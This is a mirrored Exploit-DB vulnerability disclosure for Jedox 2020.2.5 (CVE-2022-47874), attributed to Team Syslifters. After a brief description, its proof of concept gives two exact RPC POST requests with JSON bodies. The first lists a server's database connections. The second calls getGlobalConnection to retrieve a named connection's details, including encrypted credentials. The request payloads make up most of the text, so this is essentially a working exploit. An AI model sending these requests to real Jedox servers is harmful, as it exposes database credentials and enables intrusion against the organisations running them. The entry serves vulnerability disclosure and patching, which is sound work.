Jedox 2020.2.5 – Disclosure of Database Credentials via Improper Access Controls

• Exploit Database
• 13 阅读

• 作者： Team Syslifters
  日期： 2023-05-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51428/

• # Exploit Title: Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls
  # Date: 28/04/2023
  # Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
  # Vendor Homepage: https://jedox.com
  # Version: Jedox 2020.2 (20.2.5) and older
  # CVE : CVE-2022-47874
  
  
  Introduction
  =================
  Improper access controls in `/tc/rpc` allows remote authenticated users to view details of database connections via the class `com.jedox.etl.mngr.Connections` and the method `getGlobalConnection`. To exploit the vulnerability, the attacker must know the name of the database connection.
  
  
  Write-Up
  =================
  See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
  
  
  Proof of Concept
  =================
  1) List all available database connections via `conn::ls` (see also: CVE-2022-47879):
  
  	PATH: /be/rpc.php
  	METHOD: POST
  	BODY:
  	[
  		[
  			"conn",
  			"ls",
  			[
  				null,
  				false,
  				true,
  				[
  					"type",
  					"active",
  					"description"
  				]
  			]
  		]
  	]
  
  2) Retrieve details of a database connection (specify connection name via CONNECTION) including encrypted credentials using the Java RPC function `com.jedox.etl.mngr.Connection::getGlobalConnection`:
  
  	PATH: /tc/rpc
  	METHOD: POST
  	BODY:
  	[
  		[
  			"com.jedox.etl.mngr.Connections",
  			"getGlobalConnection",
  			[
  				"<CONNECTION>"
  			]
  		]
  	]